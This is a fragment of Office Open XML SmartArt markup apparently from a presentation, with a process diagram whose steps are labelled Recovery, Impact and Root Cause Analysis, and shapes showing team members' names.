    <dgm:cxn modelId="{3664A0AF-624A-4779-8569-2F846DCC29F9}" type="presParOf" srcId="{57EB53E0-B8C8-4669-9614-94EAF42845BB}" destId="{5F8BD294-06DC-4F14-AFAB-0C573EF8AA6C}" srcOrd="5"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16BB94E-DC72-497D-B226-B0FC16054337}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA843D4D-E810-4566-B1F4-40B373ED5B3F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>4. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Recovery</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FC3DF38D-7865-4542-94D9-84CC753F9CC6}" cxnId="{19B82929-0F27-46EB-B0DB-0688FBA17AC0}" type="parTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{520DE892-FB28-4346-91FB-340DB2EDD0FD}" cxnId="{19B82929-0F27-46EB-B0DB-0688FBA17AC0}" type="sibTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF181E64-A678-4622-94B5-DAE4CC2C99A0}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>5. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Impact</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DDE709C-61C0-4E2F-9175-9BE8B809FE61}" cxnId="{B434B8C3-420C-465C-A28D-BC8C860A3290}" type="parTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AABBA7B7-5A58-4032-8FD7-2682C5DCA123}" cxnId="{B434B8C3-420C-465C-A28D-BC8C860A3290}" type="sibTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{98C4C817-C922-455B-9428-B6CCC3FE95F6}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>6. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Root Cause Analysis</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B32084C6-7AA8-4322-82BE-B28FAACCC8C3}" cxnId="{F88CB9DA-38B3-4170-8E03-BF09B478AD0B}" type="parTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{469AF9F5-85B4-4CC4-9BC1-3731BE33FB09}" cxnId="{F88CB9DA-38B3-4170-8E03-BF09B478AD0B}" type="sibTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0CC5C2BB-CCAE-42FE-B631-B6BE53EACFD9}" type="pres">
      <dgm:prSet presAssocID="{416BB94E-DC72-497D-B226-B0FC16054337}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="7"/>
          <dgm:chPref val="7"/>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D2327BE5-75BD-4450-B59F-6AE2986C6580}" type="pres">
      <dgm:prSet presAssocID="{AA843D4D-E810-4566-B1F4-40B373ED5B3F}" presName="Accent1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7A2944B7-F8B7-4900-8BBD-942FA19DF801}" type="pres">
      <dgm:prSet presAssocID="{AA843D4D-E810-4566-B1F4-40B373ED5B3F}" presName="Accent" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EAD8C68E-E856-4971-A6C9-58836C912B64}" type="pres">
      <dgm:prSet presAssocID="{AA843D4D-E810-4566-B1F4-40B373ED5B3F}" presName="Parent1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{64F3429C-5D4C-4FC5-A2D7-8C69A3F12A6C}" type="pres">
      <dgm:prSet presAssocID="{EF181E64-A678-4622-94B5-DAE4CC2C99A0}" presName="Accent2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{58DCE2BB-E7BA-4467-A876-E02B12BAA70E}" type="pres">
      <dgm:prSet presAssocID="{EF181E64-A678-4622-94B5-DAE4CC2C99A0}" presName="Accent" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{74223A5C-B074-4AB7-8101-B679B264A52B}" type="pres">
      <dgm:prSet presAssocID="{EF181E64-A678-4622-94B5-DAE4CC2C99A0}" presName="Parent2" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2788636B-C4FE-4C44-9C48-8B49466F1213}" type="pres">
      <dgm:prSet presAssocID="{98C4C817-C922-455B-9428-B6CCC3FE95F6}" presName="Accent3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5FEBBA16-0F92-4262-8D57-E2AF56F832AB}" type="pres">
      <dgm:prSet presAssocID="{98C4C817-C922-455B-9428-B6CCC3FE95F6}" presName="Accent" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2E5AB9BA-1325-4B23-876C-6488374DCAE7}" type="pres">
      <dgm:prSet presAssocID="{98C4C817-C922-455B-9428-B6CCC3FE95F6}" presName="Parent3" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{C4DCC80E-6B4F-4BD7-AB40-A2CF6D429859}" type="presOf" srcId="{98C4C817-C922-455B-9428-B6CCC3FE95F6}" destId="{2E5AB9BA-1325-4B23-876C-6488374DCAE7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{717E2725-84D0-420E-A6C1-F86719557A91}" type="presOf" srcId="{EF181E64-A678-4622-94B5-DAE4CC2C99A0}" destId="{74223A5C-B074-4AB7-8101-B679B264A52B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{19B82929-0F27-46EB-B0DB-0688FBA17AC0}" srcId="{416BB94E-DC72-497D-B226-B0FC16054337}" destId="{AA843D4D-E810-4566-B1F4-40B373ED5B3F}" srcOrd="0" destOrd="0" parTransId="{FC3DF38D-7865-4542-94D9-84CC753F9CC6}" sibTransId="{520DE892-FB28-4346-91FB-340DB2EDD0FD}"/>
    <dgm:cxn modelId="{701F4A5D-29EE-44FF-B2F5-D3745BC0E348}" type="presOf" srcId="{AA843D4D-E810-4566-B1F4-40B373ED5B3F}" destId="{EAD8C68E-E856-4971-A6C9-58836C912B64}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{A5DB7DB0-7C11-4453-949F-7033B48C232F}" type="presOf" srcId="{416BB94E-DC72-497D-B226-B0FC16054337}" destId="{0CC5C2BB-CCAE-42FE-B631-B6BE53EACFD9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{B434B8C3-420C-465C-A28D-BC8C860A3290}" srcId="{416BB94E-DC72-497D-B226-B0FC16054337}" destId="{EF181E64-A678-4622-94B5-DAE4CC2C99A0}" srcOrd="1" destOrd="0" parTransId="{1DDE709C-61C0-4E2F-9175-9BE8B809FE61}" sibTransId="{AABBA7B7-5A58-4032-8FD7-2682C5DCA123}"/>
    <dgm:cxn modelId="{F88CB9DA-38B3-4170-8E03-BF09B478AD0B}" srcId="{416BB94E-DC72-497D-B226-B0FC16054337}" destId="{98C4C817-C922-455B-9428-B6CCC3FE95F6}" srcOrd="2" destOrd="0" parTransId="{B32084C6-7AA8-4322-82BE-B28FAACCC8C3}" sibTransId="{469AF9F5-85B4-4CC4-9BC1-3731BE33FB09}"/>
    <dgm:cxn modelId="{C916C128-CC61-446B-A2ED-8E2C6644DD8C}" type="presParOf" srcId="{0CC5C2BB-CCAE-42FE-B631-B6BE53EACFD9}" destId="{D2327BE5-75BD-4450-B59F-6AE2986C6580}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{06BF6BB2-9691-4ECF-9C5B-9D5E1A7D36F1}" type="presParOf" srcId="{D2327BE5-75BD-4450-B59F-6AE2986C6580}" destId="{7A2944B7-F8B7-4900-8BBD-942FA19DF801}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{7090BFFE-F516-4AC9-955F-0D6A8786D235}" type="presParOf" srcId="{0CC5C2BB-CCAE-42FE-B631-B6BE53EACFD9}" destId="{EAD8C68E-E856-4971-A6C9-58836C912B64}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{F90A0B12-568E-429F-8262-EBB6E5A0F2ED}" type="presParOf" srcId="{0CC5C2BB-CCAE-42FE-B631-B6BE53EACFD9}" destId="{64F3429C-5D4C-4FC5-A2D7-8C69A3F12A6C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{F2E1860B-11D7-4A85-A8D0-18F6A0694F08}" type="presParOf" srcId="{64F3429C-5D4C-4FC5-A2D7-8C69A3F12A6C}" destId="{58DCE2BB-E7BA-4467-A876-E02B12BAA70E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{8EB1CA5D-2BF3-4517-BB1E-B61EC6D532F9}" type="presParOf" srcId="{0CC5C2BB-CCAE-42FE-B631-B6BE53EACFD9}" destId="{74223A5C-B074-4AB7-8101-B679B264A52B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{F839D06B-EA50-4A60-A236-A7BF5516F24C}" type="presParOf" srcId="{0CC5C2BB-CCAE-42FE-B631-B6BE53EACFD9}" destId="{2788636B-C4FE-4C44-9C48-8B49466F1213}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{032190B8-5BA9-475E-98B9-3AF1ABAC1679}" type="presParOf" srcId="{2788636B-C4FE-4C44-9C48-8B49466F1213}" destId="{5FEBBA16-0F92-4262-8D57-E2AF56F832AB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{F2614D4C-D197-4946-819F-3689FC48C2FB}" type="presParOf" srcId="{0CC5C2BB-CCAE-42FE-B631-B6BE53EACFD9}" destId="{2E5AB9BA-1325-4B23-876C-6488374DCAE7}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrow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4785360" cy="2247900"/>
        <a:chOff x="0" y="0"/>
        <a:chExt cx="4785360" cy="2247900"/>
      </a:xfrm>
    </dsp:grpSpPr>
    <dsp:sp modelId="{ED3B2D2D-8F1B-49A7-ABC2-3177E7B0EAE5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="3" name="Rectangles 2"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="93536" y="379311"/>
          <a:ext cx="2244820" cy="701506"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="1">
          <a:schemeClr val="accent1"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="lt1">
            <a:alpha val="40000"/>
          </a:schemeClr>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
      <dsp:txBody>
        <a:bodyPr lIns="475153" tIns="68580" rIns="68580" bIns="68580" anchor="ctr"/>
        <a:lstStyle>
          <a:lvl1pPr algn="l">
            <a:defRPr sz="1800"/>
          </a:lvl1pPr>
          <a:lvl2pPr marL="114300" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl2pPr>
          <a:lvl3pPr marL="228600" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl3pPr>
          <a:lvl4pPr marL="342900" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl4pPr>
          <a:lvl5pPr marL="457200" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl5pPr>
          <a:lvl6pPr marL="571500" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl6pPr>
          <a:lvl7pPr marL="685800" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl7pPr>
          <a:lvl8pPr marL="800100" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl8pPr>
          <a:lvl9pPr marL="914400" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl9pPr>
        </a:lstStyle>
        <a:p>
          <a:pPr lvl="0" algn="ctr">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Hassan Mahmoud Madkour</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="93536" y="379311"/>
        <a:ext cx="2244820" cy="701506"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C5FDA3F7-3846-4A0B-8C6B-804A96CF3D77}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="4" name="Rectangles 3"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="2" y="277983"/>
          <a:ext cx="491054" cy="736582"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:schemeClr val="lt1"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="accent1">
            <a:tint val="50000"/>
          </a:schemeClr>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
      <dsp:txXfrm>
        <a:off x="2" y="277983"/>
        <a:ext cx="491054" cy="736582"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{35CC1509-1D05-4D52-B943-A6028ADC48B3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="5" name="Rectangles 4"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="2541734" y="379311"/>
          <a:ext cx="2244820" cy="701506"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="1">
          <a:schemeClr val="accent1"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="lt1">
            <a:alpha val="40000"/>
          </a:schemeClr>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
      <dsp:txBody>
        <a:bodyPr lIns="475153" tIns="68580" rIns="68580" bIns="68580" anchor="ctr"/>
        <a:lstStyle>
          <a:lvl1pPr algn="l">
            <a:defRPr sz="1800"/>
          </a:lvl1pPr>
          <a:lvl2pPr marL="114300" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl2pPr>
          <a:lvl3pPr marL="228600" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl3pPr>
          <a:lvl4pPr marL="342900" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl4pPr>
          <a:lvl5pPr marL="457200" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl5pPr>
          <a:lvl6pPr marL="571500" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl6pPr>
          <a:lvl7pPr marL="685800" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl7pPr>
          <a:lvl8pPr marL="800100" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl8pPr>
          <a:lvl9pPr marL="914400" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl9pPr>
        </a:lstStyle>
        <a:p>
          <a:pPr lvl="0" algn="ctr">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Ahmed Gomaa Hamed</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2541734" y="379311"/>
        <a:ext cx="2244820" cy="701506"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4F5AB7DF-6D64-456D-867A-BE487254BA7B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="6" name="Rectangles 5"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="2448199" y="277983"/>
          <a:ext cx="491054" cy="736582"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:schemeClr val="lt1"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="accent1">
            <a:tint val="50000"/>
          </a:schemeClr>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
      <dsp:txXfrm>
        <a:off x="2448199" y="277983"/>
        <a:ext cx="491054" cy="736582"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{975CC684-1E93-45E1-82FF-1809E816EF32}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="7" name="Rectangles 6"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1317329" y="1420926"/>
          <a:ext cx="2244820" cy="701506"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="1">
          <a:schemeClr val="accent1"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="lt1">
            <a:alpha val="40000"/>
          </a:schemeClr>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
      <dsp:txBody>
        <a:bodyPr lIns="475153" tIns="68580" rIns="68580" bIns="68580" anchor="ctr"/>
        <a:lstStyle>
          <a:lvl1pPr algn="l">
            <a:defRPr sz="1800"/>
          </a:lvl1pPr>
          <a:lvl2pPr marL="114300" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl2pPr>
          <a:lvl3pPr marL="228600" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl3pPr>
          <a:lvl4pPr marL="342900" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl4pPr>
          <a:lvl5pPr marL="457200" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl5pPr>
          <a:lvl6pPr marL="571500" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl6pPr>
          <a:lvl7pPr marL="685800" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl7pPr>
          <a:lvl8pPr marL="800100" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl8pPr>
          <a:lvl9pPr marL="914400" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl9pPr>
        </a:lstStyle>
        <a:p>
          <a:pPr lvl="0" algn="ctr">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Fady Maged Sabry</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1317329" y="1420926"/>
        <a:ext cx="2244820" cy="701506"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FF8736D7-9515-40B7-99A8-0C40AF97E8A9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="8" name="Rectangles 7"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1223795" y="1167082"/>
          <a:ext cx="491054" cy="736582"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:schemeClr val="lt1"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="accent1">
            <a:tint val="50000"/>
          </a:schemeClr>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
      <dsp:txXfrm>
        <a:off x="1223795" y="1167082"/>
        <a:ext cx="491054" cy="7365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4701540" cy="1440180"/>
        <a:chOff x="0" y="0"/>
        <a:chExt cx="4701540" cy="1440180"/>
      </a:xfrm>
    </dsp:grpSpPr>
    <dsp:sp modelId="{F26C90EF-DB7F-4ECA-944E-DCDDB98E59FA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="3" name="Rectangles 2"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="92493" y="423350"/>
          <a:ext cx="2219772" cy="693679"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="1">
          <a:schemeClr val="accent1"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="lt1">
            <a:alpha val="40000"/>
          </a:schemeClr>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
      <dsp:txBody>
        <a:bodyPr lIns="469851" tIns="68580" rIns="68580" bIns="68580" anchor="ctr"/>
        <a:lstStyle>
          <a:lvl1pPr algn="l">
            <a:defRPr sz="1800"/>
          </a:lvl1pPr>
          <a:lvl2pPr marL="114300" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl2pPr>
          <a:lvl3pPr marL="228600" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl3pPr>
          <a:lvl4pPr marL="342900" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl4pPr>
          <a:lvl5pPr marL="457200" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl5pPr>
          <a:lvl6pPr marL="571500" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl6pPr>
          <a:lvl7pPr marL="685800" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl7pPr>
          <a:lvl8pPr marL="800100" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl8pPr>
          <a:lvl9pPr marL="914400" indent="-114300" algn="l">
            <a:defRPr sz="1400"/>
          </a:lvl9pPr>
        </a:lstStyle>
        <a:p>
          <a:pPr lvl="0" algn="ctr">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Zakaria Yousry Zakaria</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="92493" y="423350"/>
        <a:ext cx="2219772" cy="693679"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3AA4DDCC-E871-49A6-A456-B4B0B1E0A509}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="4" name="Rectangles 3"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="3" y="323152"/>
          <a:ext cx="485575" cy="728363"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:schemeClr val="lt1"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:schemeClr val="accent1">
            <a:tint val="50000"/>
          </a:schemeClr>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
      <dsp:txXfrm>
        <a:off x="3" y="323152"/>
        <a:ext cx="485575" cy="728363"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E1BF891F-B4F6-470A-A2F1-A5B864054943}">
      <dsp:nvSpPr>
